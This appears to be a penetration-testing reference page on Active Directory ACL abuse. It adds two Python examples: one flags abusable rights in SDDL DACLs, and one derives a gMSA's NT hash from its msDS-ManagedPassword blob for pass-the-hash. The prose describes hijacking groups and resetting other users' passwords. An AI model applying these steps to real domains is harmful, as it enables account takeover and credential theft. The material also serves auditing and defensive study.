ACL Abuse

Abuse of ACL access rights to achieve lateral movement

Permissions in Active Directory are controlled through Access Control Lists (ACL). Every securable object in the directory (user, group, computer, OU, GPO, the domain object itself) carries a security descriptor whose discretionary ACL (DACL) defines which security principals (users, groups, computers) have access to that object and what level of access they are granted. A DACL is made up of Access Control Entries (ACE); each ACE explicitly allows or denies a set of access rights to one trustee, optionally scoped by an object GUID to a single attribute or extended right.

If misconfigured, ACLs can be leveraged by attackers to achieve lateral movement or privilege escalation inside the domain. Which abuse is possible depends on the specific right the attacker-controlled principal holds over the target object: GenericAll, WriteDacl or WriteOwner amount to full control, WriteProperty on the member attribute allows adding members to a group, the ForceChangePassword extended right allows resetting a user's password, and being listed in a gMSA's msDS-GroupMSAMembership allows reading its password.
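As an added example that is not part of this page, the following Python parses the DACL portion of an SDDL string, such as the Sddl property returned by Get-Acl on an AD: path, maps the two-letter rights codes and object GUIDs to their meaning, and reports which trustees hold a right that can be abused. The SDDL string and its S-1-5-21-... SIDs are constructed for the example; the access-mask values and the GUIDs for the member attribute, User-Force-Change-Password and the DS-Replication-Get-Changes rights are the real schema values.

```python
"""Parse the DACL of an SDDL string and flag ACEs whose rights an attacker could abuse."""
import re

# SDDL two-letter rights codes -> access-mask bits (WinNT.h / Iads.h values).
RIGHT_CODES = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "WO": 0x00080000, "WD": 0x00040000, "RC": 0x00020000, "SD": 0x00010000,
    "CC": 0x01, "DC": 0x02, "LC": 0x04, "SW": 0x08, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
}
GENERIC_ALL, GENERIC_WRITE = RIGHT_CODES["GA"], RIGHT_CODES["GW"]
WRITE_DAC, WRITE_OWNER = RIGHT_CODES["WD"], RIGHT_CODES["WO"]
SELF_WRITE, WRITE_PROPERTY, CONTROL_ACCESS = RIGHT_CODES["SW"], RIGHT_CODES["WP"], RIGHT_CODES["CR"]

# Schema GUIDs that turn a generic right into a specific abuse primitive.
OBJECT_GUIDS = {
    "bf9679c0-0de6-11d0-a285-00aa003049e2": "member",
    "00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
SID_ALIASES = {"DA": "Domain Admins", "EA": "Enterprise Admins", "DU": "Domain Users",
               "AU": "Authenticated Users", "WD": "Everyone", "BA": "Administrators", "SY": "SYSTEM"}


def parse_rights(field: str) -> int:
    """The rights field is either a hex access mask or a run of two-letter codes."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= RIGHT_CODES[field[i:i + 2]]
    return mask


def parse_dacl(sddl: str) -> list:
    """Return the DACL ACEs as dicts; each ACE is (type;flags;rights;object_guid;inherit_guid;sid)."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)   # "D:" + DACL flags + ACE list
    if not m:
        return []
    aces = []
    for raw in re.findall(r"\(([^)]*)\)", m.group(1)):
        ace_type, flags, rights, obj_guid, inherit_guid, sid = raw.split(";")[:6]
        aces.append({
            "type": ace_type, "flags": flags, "mask": parse_rights(rights),
            "object_guid": obj_guid.lower(), "inherited_object_guid": inherit_guid.lower(),
            "trustee": SID_ALIASES.get(sid, sid),
        })
    return aces


def abuse_paths(ace: dict) -> list:
    """Describe what the trustee of an allow ACE can do with the rights it grants."""
    if ace["type"] not in ("A", "OA"):
        return []                                   # deny and audit ACEs grant nothing
    mask, guid = ace["mask"], ace["object_guid"]
    target = OBJECT_GUIDS.get(guid, guid)           # empty GUID means the whole object
    paths = []
    if mask & GENERIC_ALL:
        paths.append("GenericAll: full control of the object")
    if mask & WRITE_DAC:
        paths.append("WriteDacl: can grant itself any right on the object")
    if mask & WRITE_OWNER:
        paths.append("WriteOwner: can take ownership, then rewrite the DACL")
    if mask & GENERIC_WRITE or (mask & WRITE_PROPERTY and not guid):
        paths.append("GenericWrite: can write any attribute")
    elif target == "member":
        if mask & WRITE_PROPERTY:
            paths.append("WriteProperty(member): can add any principal to the group")
        elif mask & SELF_WRITE:
            paths.append("Self(member): can add itself to the group")
    if mask & CONTROL_ACCESS:
        if not guid:
            paths.append("AllExtendedRights: includes password reset and replication rights")
        elif target == "User-Force-Change-Password":
            paths.append("ForceChangePassword: can reset the password without knowing it")
        elif target.startswith("DS-Replication-Get-Changes"):
            paths.append(f"{target}: one of the two rights needed for DCSync")
    return paths


def find_abusable(sddl: str) -> dict:
    """Map trustee -> abuse paths for every allow ACE that grants something dangerous."""
    result = {}
    for ace in parse_dacl(sddl):
        for path in abuse_paths(ace):
            result.setdefault(ace["trustee"], []).append(path)
    return result


# Constructed DACL mixing ACEs as they would appear on group and user objects;
# the S-1-5-21-... SIDs are made up for the example.
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)"
    "(OA;;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-1004336348-1177238915-682003330-1123)"
    "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;S-1-5-21-1004336348-1177238915-682003330-1124)"
    "(A;;WD;;;S-1-5-21-1004336348-1177238915-682003330-1125)"
    "(A;;RPLCLORC;;;AU)"
    "(D;;GA;;;S-1-5-21-1004336348-1177238915-682003330-1126)"
)

if __name__ == "__main__":
    for trustee, paths in find_abusable(SAMPLE_SDDL).items():
        print(trustee)
        for path in paths:
            print("   ", path)
```

The output is a list of candidates, not effective access: deny ACEs on the same trustee, inheritance flags and nested group membership are not resolved here, so confirm each finding against the effective permissions before relying on it.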


Abuse ACL access over groups

Use write access over a group (GenericAll, GenericWrite, WriteProperty on the member attribute, or the Self-Membership validated write) to add an attacker-controlled user to it.

Abuse ACL access over users

Use write access over a user (GenericAll, GenericWrite, WriteDacl, WriteOwner, or the ForceChangePassword extended right) to take over that user account, for example by resetting its password.

Group Managed Service Account

Read the NT password hash of Group Managed Service Accounts (gMSA) from the msDS-ManagedPassword attribute, which only the principals listed in the account's msDS-GroupMSAMembership are allowed to retrieve.
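As an added example that is not part of this page, the following Python shows what the final step of the gMSA technique does with the attribute once it has been read: it parses the MSDS-MANAGEDPASSWORD_BLOB layout from MS-ADTS and computes the NT hash as MD4 over the raw UTF-16LE CurrentPassword bytes. MD4 is implemented inline because hashlib builds on OpenSSL 3 often refuse it. The sample blob is constructed by build_managed_password_blob from the password "password"; a real blob is the value of msDS-ManagedPassword.

```python
"""Derive a gMSA's NT hash from its msDS-ManagedPassword blob (MSDS-MANAGEDPASSWORD_BLOB)."""
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), since OpenSSL 3 builds of hashlib often lack it."""
    mask = 0xFFFFFFFF

    def f(x, y, z):
        return ((x & y) | (~x & z)) & mask

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    msg = bytearray(data) + b"\x80"                        # pad to 56 mod 64, then 64-bit LE bit length
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (                                            # (function, constant, word order, shifts)
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, j in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[j] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c                    # rotate roles: next step updates old d
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password_utf16le: bytes) -> str:
    """NT hash = MD4 over the UTF-16LE password bytes, without the terminator."""
    return md4(password_utf16le).hex()


def parse_managed_password_blob(blob: bytes) -> dict:
    """Parse the blob; all offsets in the 16-byte header are relative to the start of the blob."""
    version, _reserved, _length, cur_off, prev_off, query_off, unchanged_off = struct.unpack_from(
        "<HHIHHHH", blob, 0)
    if version != 1:
        raise ValueError("unsupported managed password blob version")

    def wstr(off):
        # Password fields are null-terminated WCHAR strings: scan in 2-byte steps, keep raw bytes.
        end = off
        while blob[end:end + 2] not in (b"\x00\x00", b""):
            end += 2
        if not blob[end:end + 2]:
            raise ValueError("unterminated password string")
        return blob[off:end]

    return {
        "current_password": wstr(cur_off),
        "previous_password": wstr(prev_off) if prev_off else b"",
        "query_password_interval": struct.unpack_from("<Q", blob, query_off)[0],
        "unchanged_password_interval": struct.unpack_from("<Q", blob, unchanged_off)[0],
    }


def gmsa_nt_hash_from_blob(blob: bytes) -> str:
    """The hash usable for pass-the-hash as the gMSA."""
    return nt_hash(parse_managed_password_blob(blob)["current_password"])


def build_managed_password_blob(current: bytes, previous: bytes = b"") -> bytes:
    """Constructed test blob in the on-wire layout (header, passwords, padding, two FILETIME intervals)."""
    header_len = 16
    cur = current + b"\x00\x00"
    prev = previous + b"\x00\x00" if previous else b""
    cur_off = header_len
    prev_off = header_len + len(cur) if previous else 0
    body = cur + prev
    pad = (-(header_len + len(body))) % 8                 # keep the interval fields 8-byte aligned
    query_off = header_len + len(body) + pad
    unchanged_off = query_off + 8
    length = unchanged_off + 8
    header = struct.pack("<HHIHHHH", 1, 0, length, cur_off, prev_off, query_off, unchanged_off)
    return header + body + b"\x00" * pad + struct.pack("<QQ", 3600 * 10_000_000, 86400 * 10_000_000)


# Constructed sample: a real gMSA password is 256 random UTF-16 code units, not a word.
SAMPLE_BLOB = build_managed_password_blob("password".encode("utf-16-le"))

if __name__ == "__main__":
    print(gmsa_nt_hash_from_blob(SAMPLE_BLOB))
```

Two practical points: the hash is computed over the raw bytes rather than a decoded string because real gMSA passwords contain arbitrary code units, including unpaired surrogates, that would not survive a round trip through str; and the DC only returns msDS-ManagedPassword to an authorised principal over a confidential connection (LDAPS, or LDAP with signing and sealing), so an unencrypted bind simply gets no value back.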